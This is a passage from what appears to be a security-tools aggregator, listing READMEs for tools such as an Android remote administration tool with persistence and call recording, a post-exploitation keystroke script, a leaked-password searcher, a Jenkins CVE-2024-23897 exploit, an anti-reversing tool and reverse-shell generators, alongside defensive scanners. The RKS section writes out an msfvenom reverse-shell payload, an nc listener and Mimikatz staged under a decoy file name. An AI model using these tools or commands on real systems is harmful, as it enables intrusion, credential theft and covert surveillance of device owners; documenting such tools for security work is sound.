  • :floppy_disk: Easy copying of direct file URLs for streamlined sharing
  • :pencil2: Integration with Cloud9 IDE, offering syntax highlighting for over 150+ languages and a selection of 35+ themes
  • :page_facing_up: Seamless integration with Google/Microsoft doc viewer for previewing various file types such as PDF/DOC/XLS/PPT/etc. Files up to 25 MB can be previewed using the Google Drive viewer
  • :zap: Backup functionality, IP blacklist/whitelist management, and more
  • :mag_right: Powerful search capabilities using datatable js for efficient file filtering
  • :file_folder: Ability to exclude specific folders and files from the listing
  • :globe_with_meridians: Multi-language support (32+ languages) with a built-in translation feature, requiring no additional files
  • :bangbang: And much more...

License, Credit
  • Available under the GNU license
  • Original concept and development by
  • CDN Used - jQuery, Bootstrap, Font Awesome, Highlight js, ace js, DropZone js, and DataTable js
  • To report a bug or request a feature, please file an issue

Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.

The summary of the changelog since the 2023.4 release from December is:

Moukthar - Android Remote Administration Tool

By: Zion3R

Remote adminitration tool for android

  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

  • Clone repository console git clone
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
  • Set C2 server and web socket server address in client functionality/ ```java public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target

  • Auto scroll logs on dashboard

RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program

By: Zion3R

A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.

About RKS (RemoteKeyStrokes)

All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.

Help Menu
$ ./ -h
Usage: ./ (RemoteKeyStrokes)
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not

-h, --help Display this help message


Internal Reconnaissance
  • When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.h -c recon_cmds.txt

Execute Implant
  • Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./ -c implant.ps1

$ nc -lvnp 4444

File Transfer
  • Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.
$ ./ -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./ -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Specify Grapical Remote Software
  • If you're targeting VNC network protocols you can specify the window name with tightvnc.

$ ./ -i implant.ps1 -w tightvnc

  • If you're targeting legacy operating systems with older RDP authentication specify the window name with rdesktop.

$ ./ -i implant.bat -w rdesktop

TODO and Help Wanted
  • Add text colors for better user experience

  • Implement Base64 file transfer

  • Implement Bin2Hex file transfer

  • Implement a persistence function for both windows and linux.

  • Implement antiforensics function for both windows and linux.

  • Implement to read shellcode input and run C# implant and powershell runspace

  • Implement privesc function for both windows and linux



LeakSearch - Search & Parse Password Leaks

By: Zion3R

LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.

In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

  • Python 3
  • Install requirements


It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone

  _               _     ____                      _     
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|

------------------- by @JoelGMSec -------------------

usage: [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)

The detailed guide of use can be found at the following link:


This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).


This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog

CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (docx, xlsx, pptx, pdf)

By: Zion3R

Detecting Canary Tokens and Suspicious URLs in Microsoft Office, Acrobat Reader PDF and Zip Files


In the dynamic realm of cybersecurity, vigilance and proactive defense are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.

Understanding the Script


The script smartly identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. These file types, including Office documents, are zip archives that can be examined programmatically.

Decompression and Scanning

For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.

Ignoring Certain URLs

To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused analysis on unusual or potentially harmful URLs.

Flagging Suspicious Files

Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.

Cleanup and Restoration

Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.


To effectively utilize the script:

  1. Setup
  2. Ensure Python is installed on your system.
  3. Position the script in an accessible location.
  4. Execute the script with the command: python FILE_OR_DIRECTORY_PATH (Replace FILE_OR_DIRECTORY_PATH with the actual file or directory path.)

  5. Interpretation

  6. Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. Manual examination and additional security measures are advisable.

Script Showcase


An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.


This script is intended for educational and security testing purposes only. Utilize it responsibly and in compliance with applicable laws and regulations.

Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

By: Zion3R

New bug bounty(vulnerabilities) collector

  • Chrome with GUI (If you encounter trouble with script execution, check the status of VMs GPU features, if available.)
  • Chrome WebDriver

# python3

*2024-02-20 16:14:47.836189*

1. Arbitrary File Reading due to Lack of Input Filepath Validation
- Feb 6th 2024 / High (CVE-2024-0964)
- gradio-app/gradio

2. View Barcode Image leads to Remote Code Execution
- Jan 31st 2024 / Critical (CVE: Not yet)
- dolibarr/dolibarr

(delimiter-based file database)

# vim feeds.db

1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|
2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|
3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|
4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|
5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|

  • This code is designed to parse HTML elements from, so it may not function correctly if the HTML page structure changes.
  • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
  • If get in trouble In a typical cloud environment, scripts may not function properly within virtual machines (VMs).

BackDoorSim - An Educational Into Remote Administration Tools

By: Zion3R

BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.

  • File Transfer: Upload and download files between server and client.
  • Screenshot Capture: Take screenshots from the client's system.
  • System Information Gathering: Retrieve detailed system and security software information.
  • Camera Access: Capture images from the client's webcam.
  • Notifications: Send and display notifications on the client system.
  • Help Menu: Easy access to command information and usage.


To set up BackdoorSim, you will need to install it on both the server and client machines.

  1. Clone the repository:

shell $ git clone

  1. Navigate to the project directory:

shell $ cd BackDoorSim

  1. Install the required dependencies:

shell $ pip install -r requirements.txt


After starting both the server and client, you can use the following commands in the server's command prompt:

  • upload [file_path]: Upload a file to the client.
  • download [file_path]: Download a file from the client.
  • screenshot: Capture a screenshot from the client.
  • sysinfo: Get system information from the client.
  • securityinfo: Get security software status from the client.
  • camshot: Capture an image from the client's webcam.
  • notify [title] [message]: Send a notification to the client.
  • help: Display the help menu.


BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

DepNot: RansomwareSim

If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool

BackdoorSim: An Educational into Remote Administration Tools

If you want to read our article about Backdoor


Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


For any inquiries or further information, you can reach me through the following channels:

CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner

By: Zion3R

Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.


Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python -t <target> -p <port> -f <file>


python -i <input_file> -f <file>

Parameters: - -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. - -i or --input-file: Path to input file containing hosts in the format of (one per line). - -o or --output-file: Export results to file (optional). - -p or --port: Specify the port number. Default is 8080 (optional). - -f or --file: Specify the file to read on the target system.


[27th January 2024] - Feature Request
  • Added scanning/exploiting via input file with hosts (-i INPUT_FILE).
  • Added export to file (-o OUTPUT_FILE).

[26th January 2024] - Initial Release
  • Initial release.


Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Alexander Hagenah - URL - Twitter


This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.

swaggerHole - A Python3 Script Searching For Secret On Swaggerhub

By: Zion3R


This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub]( This tool is multithreaded and pipe mode is available :)Β 


Β - python3 (sudo apt install python3) - pip3 (sudo apt install python3-pip) ## Installation
pip3 install swaggerhole
or cloning this repository and running
git clone
pip3 install .


   _____ _      __ ____ _ ____ _ ____ _ ___   _____
/ ___/| | /| / // __ `// __ `// __ `// _ \ / ___/
(__ ) | |/ |/ // /_/ // /_/ // /_/ // __// /
/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/
__ __ __ /____/ /____/
/ / / /____ / /___
/ /_/ // __ \ / // _ \
/ __ // /_/ // // __/
/_/ /_/ \____//_/ \___/

usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
Term to search
-o OUT, --out OUT Output directory
-t THREADS, --threads THREADS
Threads number (Default 25)
-j, --json Json ouput
-q, --quiet Remove banner
-du, --deactivate_url
Deactivate the URL filtering
-de, --deactivate_email
Deactivate the email filtering

Search for secret about a domain

swaggerHole -s

echo | swaggerHole

Search for secret about a domain and output to json

swaggerHole -s --json

echo | swaggerHole --json

Search for secret about a domain and do it fast :)

swaggerHole -s -t 100

echo | swaggerHole -t 100

Output explanation

Normal output

Β `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`Β 

Json output

Β `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`Β 

Deactivate url/emailΒ 

Using -du or -de remove the filtering done by the tool. There is more false positive with those options.Β 

RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

By: Zion3R

RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.

  • Automated scanning of domains and subdomains for exposed .git repositories.
  • Streamlines the detection of sensitive data exposures.
  • User-friendly command-line interface.
  • Ideal for security audits and Bug Bounty.


Clone the repository and install the required dependencies:

git clone
cd RepoReaper
pip install -r requirements.txt
chmod +x


RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

To start RepoReaper, simply run:


Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains

Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β 


This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.

SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

By: Zion3R

SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.

  • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
  • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
  • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
  • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
  • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
  • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
  • User-Friendly Interface: Easy to use, providing clear and concise information.
  • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.




Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.


Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.


Patching Prioritization System

The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

  • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
  • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
  • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
  • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
  • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
  • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.


[17th February 2024] - Enhancement Update
  • Additional Information: Added further information such as references & vector string
  • Removed: Star count in publicly available exploits

[15th January 2024] - Enhancement Update
  • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
  • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
  • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
  • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

[13th January 2024] - Initial Release
  • Initial release of SploitScan.


Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Alexander Hagenah - URL - Twitter


SpeedyTest - Command-Line Tool For Measuring Internet Speed

By: Zion3R

SpeedyTest is a powerful command-line tool for measuring internet speed. With its advanced features and intuitive interface, it provides accurate and comprehensive speed test results. Whether you're a network administrator, developer, or simply want to monitor your internet connection, SpeedyTest is the perfect tool for the job.

  • Measure download speed, upload speed, and ping latency.
  • Generate detailed reports with graphical representation of speed test results.
  • Save and export test results in various formats (CSV, JSON, etc.).
  • Customize speed test parameters and server selection.
  • Compare speed test results over time to track performance changes.
  • Integrate SpeedyTest into your own applications using the provided API.
  • track your timeline with saved database

git clone


Before you can use SpeedyTest, you need to make sure that you have the necessary requirements installed. You can install these requirements by running the following command:

pip install -r requirements.txt


Run the following command to perform a speed test:


Visual Output

Receiving data \
Speed test completed!
Speed test time: 20.22 second
Server : Farknet - Konya
IP Address:
Country : Turkey
City : Konya
Ping : 20.41 ms
Download : 90.12 Mbps
Loading : 20 Mbps


Contributions are welcome! To contribute to SpeedyTest, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.


If you have any questions, comments, or suggestions about PrivacyNet, please feel free to contact me:


SpeedyTest is released under the MIT License. See LICENSE for details.

Proxmark3 4.18218 Custom Firmware

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed "DEFCON is Cancelled".

Proxmark3 4.18218 Custom Firmware

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed "DEFCON is Cancelled".

SwaggerSpy - Automated OSINT On SwaggerHub

By: Zion3R

SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.

What is Swagger?

Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.

About SwaggerHub

SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.

Why OSINT on SwaggerHub?

Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:

  1. Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.

  2. Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.

  3. Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.

  4. Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.

  5. Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.

  6. Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.

By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.

How SwaggerSpy Works

SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.

Getting Started

To use SwaggerSpy, follow these steps:

  1. Installation: Clone the SwaggerSpy repository and install the required dependencies.
git clone
cd SwaggerSpy
pip install -r requirements.txt
  1. Usage: Run SwaggerSpy with the target search terms (more accurate with domains).
python searchterm
  1. Results: SwaggerSpy will generate a report containing OSINT findings, including information about the API, endpoints, and secrets.


SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.


Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

About the Author

SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.


Regular Expressions Enhancement
  • [ ] Review and improve existing regular expressions.
  • [ ] Ensure that regular expressions adhere to best practices.
  • [ ] Check for any potential optimizations in the regex patterns.
  • [ ] Test regular expressions with various input scenarios for accuracy.
  • [ ] Document any complex or non-trivial regex patterns for better understanding.
  • [ ] Explore opportunities to modularize or break down complex patterns.
  • [ ] Verify the regular expressions against the latest specifications or requirements.
  • [ ] Update documentation to reflect any changes made to the regular expressions.


SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.


Special thanks to @Liodeus for providing project inspiration through swaggerHole.

AzSubEnum - Azure Service Subdomain Enumeration

By: Zion3R

AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.

How it works?

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.

Why i create this?

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.

➜  AzSubEnum git:(main) βœ— python3 --help
usage: [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
File containing permutations

Basic enumeration:

python3 -b retailcorp --thread 10

Using permutation wordlists:

python3 -b retailcorp --thread 10 --permutation permutations.txt

With verbose output:

python3 -b retailcorp --thread 10 --permutation permutations.txt --verbose

MrHandler - Linux Incident Response Reporting

By: Zion3R


MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.

π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
  $ pip3 install colorama
$ pip3 install paramiko
$ git clone
$ cd MrHandler
$ chmod +x
$ python3


NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes

By: Zion3R

NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.

git clone
cd NullSection
gcc nullsection.c -o nullsection


When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file."

Make good use of the tool!

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.

Wireshark Analyzer 4.2.3

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R

WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.

  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.


From Git
git clone
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 -d

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d -o

From DockerHub

You can run this application on a container after pulling from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d -o

-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!

  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /

v0.1.9 -

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.


Run the following command to install the latest version:

go install

Or you can simply grab an executable from the Releases page.


secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.

Falco 0.37.1

Sysdig Falco is a behavioral activity monitoring agent that is open source and comes with native support for containers. Falco lets you define highly granular rules to check for activities involving file and network activity, process execution, IPC, and much more, using a flexible syntax. Falco will notify you when these rules are violated. You can think about Falco as a mix between snort, ossec and strace.

Faraday 5.1.1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

By: Zion3R

SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.

Key Features

  • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
  • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
  • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
  • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
  • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.


git clone
cd SqliSniper
chmod +x
pip3 install -r requirements.txt


This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./ -h

